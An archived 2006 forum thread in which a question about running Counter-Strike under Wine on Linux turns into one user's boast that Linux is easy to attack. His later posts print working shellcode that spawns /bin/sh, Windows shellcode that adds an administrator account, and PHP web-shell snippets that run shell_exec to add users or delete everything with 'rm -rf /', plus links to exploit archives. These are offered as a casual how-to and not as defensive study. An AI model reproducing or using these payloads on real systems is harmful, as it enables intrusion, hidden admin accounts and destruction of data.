PDA

View Full Version : Anybody ever use Wine for Linux?



blue toxin
10-08-06, 01:32 AM
Anybody ever use Wine for Linux? Wine is a program which allows Windows applications to be used on Linux, and I'm trying to get Counterstrike to run on it. Unfortunately I can't even figure out how to install Counterstrike. Any idea what I run in terminal to make this happen?

Kiechi
10-08-06, 01:40 AM
Your best bet would be LT (Zarathu) or Tiay (I think).

I found this, it may prove usefull.

http://www.cstrike-planet.com/tutorial/1/5

blue toxin
10-08-06, 04:03 AM
Someone told me that Cedega is geared more for gaming while Wine is geared more for regular applications. So I'm going to give Cedega a try, maybe its interface will be different and easier to manipulate.

With Wine I don't think there's anything to "open." Someone told me I need to INSTALL Half Life through Wine. Go to the Terminal and type something like

Sudo apt-get install wine [setup.exe] or something like that. Setup.exe being the half life executable file.

I'll give Cedega a shot.

blue toxin
10-08-06, 04:12 AM
I tried that link, and everything went well until the very last step. I'm trying to install CS 1.6, and at the very end when I put the command line in to install it it paused for about 30 seconds then responded with "something updated, please retry command."

I just forget what that something was, but it was something to do with the terminal.

Kiechi
10-08-06, 04:22 AM
Unfortunatly, you are talking to me in riddles. Like I said, you should wait for Zarathu or Tiay to come online. I'm sure one of them will be able to help you out. Sorry I couldn't help you out further.

King Zarathu
10-08-06, 05:56 AM
Yes, I'm familiar with Wine. However, Steam also comes with Linux installations--why do you need Wine? Also, what distro of Linux are you using?

Kiechi: Tiay doesn't know much about Linux.

Kiechi
10-08-06, 05:59 AM
Yes, I'm familiar with Wine. However, Steam also comes with Linux installations--why do you need Wine? Also, what distro of Linux are you using?

Kiechi: Tiay doesn't know much about Linux.

Well, I was half right.

King Zarathu
10-08-06, 06:16 AM
Also, depending on your distro, you might be able to use apt-get.


sudo apt-get update
sudo apt-get upgrade
sudo apt-cache search ***
Replace *** with what you're looking for.

Or, to make things easier...


sudo -s
apt-get update
apt-get upgrade
apt-cache search ***

blue toxin
10-08-06, 06:58 AM
I was wrong. I did get response. And via IM Zarathu helped. WOOOOOOOO

lilwing89
10-08-06, 02:22 PM
i dont get it. what are advantages you have to windows, when running a linux os?

King Zarathu
10-08-06, 03:16 PM
Linux has amazing features. Built-in port scanners, fingerprinters, etc... Also, you can get XGL with compiz, which gives you a 3D desktop rendered in OpenGL.

http://video.google.com/videoplay?docid=-7587965514994593432

^^ XGL.

===

Though, from a security standpoint, it's much easier to be insecure with Linux than with Windows.

blue toxin
11-08-06, 11:41 AM
Uh, you're telling me Windows is more secure?...


Reason I'm posting is for the life of me I cannot get this font installed. I got steam to work with wine but there's a problem. At the login screen of steam, there's no text. The reason is there's no font tahoma installed. So I have the font file. I HAVE IT. I put it in my font folder as instructed. Still, I get the same issues.

How do I install this font? I've been to every google site and forum known to man. This is ridiculous installing a font is this hard...

King Zarathu
11-08-06, 12:34 PM
Uh, you're telling me Windows is more secure?...
Haha.. okay, you've got me started.

Yes, Windows is MUCH more than Linux, once everything is set up properly. Proper packages along with the proper service pack, you're all set. Let me explain.

It takes little shellcode to spawn shells and basically assrape Linux.


char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x 0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x 56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\x e8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\x c3";

void main() {
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)shellcode;

}
Simple, basic shellcode. If you understand basic programming, you understand that variable ret's pointer points at the return address to the casting of the char array "shellcode." Simple as ****. However, in order to write Windows shellcode, things get a little more complicated.


08048080 <_start>:
8048080: 31 c0 xor %eax,%eax
8048082: 31 db xor %ebx,%ebx
8048084: 31 c9 xor %ecx,%ecx
8048086: 31 d2 xor %edx,%edx

8048088: eb 37 jmp 80480c1

0804808a :
804808a: 59 pop %ecx
804808b: 88 51 0a mov %dl,0xa(%ecx)
804808e: bb 61 d9 e7 77 mov $0x77e7d961,%ebx
8048093: 51 push %ecx
8048094: ff d3 call *%ebx
8048096: eb 39 jmp 80480d1

08048098 :
8048098: 59 pop %ecx
8048099: 31 d2 xor %edx,%edx
804809b: 88 51 0b mov %dl,0xb(%ecx)
804809e: 51 push %ecx
804809f: 50 push %eax
80480a0: bb 32 b3 e7 77 mov $0x77e7b332,%ebx
80480a5: ff d3 call *%ebx
80480a7: eb 39 jmp 80480e2

080480a9 :
80480a9: 59 pop %ecx
80480aa: 31 d2 xor %edx,%edx
80480ac: 88 51 03 mov %dl,0x3(%ecx)
80480af: 31 d2 xor %edx,%edx
80480b1: 52 push %edx
80480b2: 51 push %ecx
80480b3: 51 push %ecx
80480b4: 52 push %edx
80480b5: ff d0 call *%eax

080480b7 :
80480b7: 31 d2 xor %edx,%edx
80480b9: 50 push %eax
80480ba: b8 fd 98 e7 77 mov $0x77e798fd,%eax
80480bf: ff d0 call *%eax

080480c1 :
80480c1: e8 c4 ff ff ff call 804808a
80480c6: 75 73 jne 804813b
80480c8: 65 gs
80480c9: 72 33 jb 80480fe
80480cb: 32 2e xor (%esi),%ch
80480cd: 64 fs
80480ce: 6c insb (%dx),%es:(%edi)
80480cf: 6c insb (%dx),%es:(%edi)
80480d0: 4e dec %esi

080480d1 :
80480d1: e8 c2 ff ff ff call 8048098
80480d6: 4d dec %ebp
80480d7: 65 gs
80480d8: 73 73 jae 804814d
80480da: 61 popa
80480db: 67 addr16
80480dc: 65 gs
80480dd: 42 inc %edx
80480de: 6f outsl %ds:(%esi),(%dx)
80480df: 78 41 js 8048122
80480e1: 4e dec %esi

080480e2 :
80480e2: e8 c2 ff ff ff call 80480a9
80480e7: 48 dec %eax
80480e8: 65 gs
80480e9: 79 4e jns 8048139


All of that shit gets shrinked down to a bitter:

char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x 51\x0a\xbb\x61\xd9"\
"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x 0b\x51\x50\xbb\x32"\
"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x 03\x31\xd2\x52\x51"\
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\x ff\xd0\xe8\xc4\xff"\
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x 4e\xe8\xc2\xff\xff"\
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x 4e\xe8\xc2\xff\xff"\
"\xff\x48\x65\x79\x4e";
That is, if you want to construct an exploit for an overflowable buffer, or a stack to smash. You can just compile an EXE and do the shit from there.


char code[] = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\x bb\x35\xfd\xe6\x77"\
"\xff\xd3\x31\xc0\x50\xbb\xfd\x98\xe7\x77\xff\xd3\x e8\xe0\xff\xff\xff"\
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x 65\x74\x20\x75\x73"\
"\x65\x72\x20\x55\x53\x45\x52\x4e\x41\x4d\x45\x20\x 50\x41\x53\x53\x57"\
"\x4f\x52\x44\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x 6e\x65\x74\x20\x6c"\
"\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x 6d\x69\x6e\x69\x73"\
"\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x 20\x55\x53\x45\x52"\
"\x4e\x41\x4d\x45\x4e";
That's an example of shellcode that will add an administrative account.

But this is basic ASM, requiring a payload after an exploit is found and used.


Furthermore, you only have two different versions of Windows. You have win32 and win64, win64 being for the 64 bit platform. You have many versions of Linux, and you would think that this would allow people to focus more on writing Windows shellcode? Think again.

http://www.milw0rm.com/shellcode/all

With all of the Linux operators on Intel x86 chips, along with AMD, etc... Plus, almost all servers that get hacked operate off of Linux. That's another reason you should use Windows applications. There are less of them that can get exploited when listening for a socket connection. FTP servers are a classic example. Google "ftp exploit," look at the OS the FTP server operates on, and you'll get my point.


Disagree with me == wrong

blue toxin
11-08-06, 12:42 PM
Good joke.

King Zarathu
11-08-06, 12:43 PM
Hahaha okay then.... Don't believe me. :P

CherriBlossomGirl
12-08-06, 04:25 PM
oh dear god, i swear you guys are speaking another language. I don't think I got any of that, except that there's something for linux called Wine. Why would they call it wine anyway?

King Zarathu
12-08-06, 11:06 PM
Heh.. it's okay. This asshole has already proven his extreme insecurity because he might be able to learn something from a 16 year old.

Say you have an FTP server.

You might want to check whether or not you're using Pro-FTPD or Pure-FTPD (definitely not Free-FTPD, since that's asking to be rooted). Oh, that's another thing... It's called ROOTING the box because only Linux/BSD/BSDI has the "ROOT" user.

Better idea!

Upload a file called "jigga.php."


<?php

shell_exec("adduser jiggaplz" /* more parameters in here */); ?>
Then, you have a remote shell on the other computer. Assuming that it's an Intel x86 chip, you do what you'll probably learn in your cyber security class as "local privilege escalation."

http://www.milw0rm.com/exploits/2011
^^^ Local Root Exploit

Would you not be ****ed? Yes, yes you would be.... Right, but say you don't have SSH.


<?php
shell_exec("rm -rf /");
?>

If you know your bash properly, you'll know that's really not a good thing either.

Oh, I almost forgot. How do you get these PHP codes to execute? View them in your browser, you ****ing dolt.